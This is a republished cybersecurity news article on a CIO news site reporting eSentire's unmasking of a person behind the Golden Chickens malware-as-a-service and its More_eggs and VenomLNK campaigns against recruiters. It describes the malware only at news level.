CIO News Hubb
Advertisement
  • Home
  • News
  • Operations CIO
  • Visionary CIO
  • IT Management
  • Information Security
  • Contact
No Result
View All Result
  • Home
  • News
  • Operations CIO
  • Visionary CIO
  • IT Management
  • Information Security
  • Contact
No Result
View All Result
CIO News Hubb
No Result
View All Result
Home Information Security

Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service

admin by admin
January 27, 2023
in Information Security


Jan 27, 2023Ravie LakshmananThreat Response / Cyber Crime

Cybersecurity researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona “badbullzvenom.”

eSentire’s Threat Response Unit (TRU), in an exhaustive report published following a 16-month-long investigation, said it “found multiple mentions of the badbullzvenom account being shared between two people.”

The second threat actor, known as Frapstar, is said to identify themselves as “Chuck from Montreal,” enabling the cybersecurity firm to piece together the criminal actor’s digital footprint.

This includes his real name, pictures, home address, the names of his parents, siblings, and friends, along with his social media accounts and his interests. He is also said to be the sole proprietor of a small business that’s run from his own home.

Golden Chickens, also known as Venom Spider, is a malware-as-a-service (MaaS) provider that’s linked to a variety of tools such as Taurus Builder, software to create malicious documents; and More_eggs, a JavaScript downloader that’s used to serve additional payloads.

The threat actor’s cyber arsenal has been put to use by other prominent cybercriminal groups like Cobalt Group (aka Cobalt Gang), Evilnum, and FIN6, all of which are estimated to have collectively caused losses totaling $1.5 billion.

Golden Chickens Malware Service

Past More_eggs campaigns, some dating back to 2017, have involved spear-phishing business professionals on LinkedIn with bogus job offers that give threat actors remote control over the victim’s machine, leveraging it to harvest information or deploy more malware.

Last year, in a reversal of sorts, the same tactics were employed to strike corporate hiring managers with resumes laden with malware as an infection vector.

The earliest documented record of Frapster’s activity goes back to May 2015, when Trend Micro described the individual as a “lone criminal” and a luxury car enthusiast.

“‘Chuck,’ who uses multiple aliases for his underground forum, social media, and Jabber accounts, and the threat actor claiming to be from Moldova, have gone to great lengths to disguise themselves,” eSentire researchers Joe Stewart and Keegan Keplinger said.

“They have also taken great pains to obfuscate the Golden Chickens malware, trying to make it undetectable by most AV companies, and limiting customers to using Golden Chickens for ONLY targeted attacks.”

It’s suspected that Chuck is one of the two threat actors operating the badbullzvenom account on the Exploit.in underground forum, with the other party possibly located in Moldova or Romania, eSentire noted.

The Canadian cybersecurity company said it further uncovered a new attack campaign targeting e-commerce companies, tricking recruiters into downloading a rogue Windows shortcut file from a website that masquerades as a resume.

The shortcut, a malware dubbed VenomLNK, serves as an initial access vector to drop More_eggs or TerraLoader, which subsequently acts as a conduit to deploy different modules, namely TerraRecon (for victim profiling), TerraStealer (for information theft), and TerraCrypt (for ransomware extortion).

“The malware suite is still actively being developed and is being and sold to other threat actors,” the researchers concluded, urging organizations to be on the lookout for potential phishing attempts.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.





Source link

Tags: computer securitycyber attackscyber newscyber security newscyber security news todaycyber security updatescyber updatesdata breachhacker newshacking newshow to hackinformation securitynetwork securityransomware malwaresoftware vulnerabilitythe hacker news
Previous Post

How to run AWS CloudHSM workloads in container environments

Next Post

Illustratenegative

Related Posts

Information Security

Spyware Vendors Caught Exploiting Zero-Day Vulnerabilities on Android and iOS Devices

by admin
March 29, 2023
Information Security

How to use Amazon GuardDuty and AWS WAF v2 to automatically block suspicious hosts

by admin
March 29, 2023
Information Security

Microsoft Introduces GPT-4 AI-Powered Security Copilot Tool to Empower Defenders

by admin
March 28, 2023
Information Security

20-Year-Old BreachForums Founder Faces Up to 5 Years in Prison

by admin
March 27, 2023
Information Security

Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers

by admin
March 26, 2023
Next Post

Illustratenegative

Recommended

Innatelogicalfluency ~ Future of CIO

March 30, 2023

Spyware Vendors Caught Exploiting Zero-Day Vulnerabilities on Android and iOS Devices

March 29, 2023

How to use Amazon GuardDuty and AWS WAF v2 to automatically block suspicious hosts

March 29, 2023

Influencing ~ Future of CIO

March 29, 2023

Microsoft Introduces GPT-4 AI-Powered Security Copilot Tool to Empower Defenders

March 28, 2023

Illogic ~ Future of CIO

March 28, 2023

© CIO News Hubb All rights reserved.

Use of these names, logos, and brands does not imply endorsement unless specified. By using this site, you agree to the Privacy Policy and Terms & Conditions.

Navigate Site

  • Home
  • News
  • Operations CIO
  • Visionary CIO
  • IT Management
  • Information Security
  • Contact

Newsletter Sign Up

No Result
View All Result
  • Home
  • News
  • Operations CIO
  • Visionary CIO
  • IT Management
  • Information Security
  • Contact

© 2022 CIO News Hubb All rights reserved.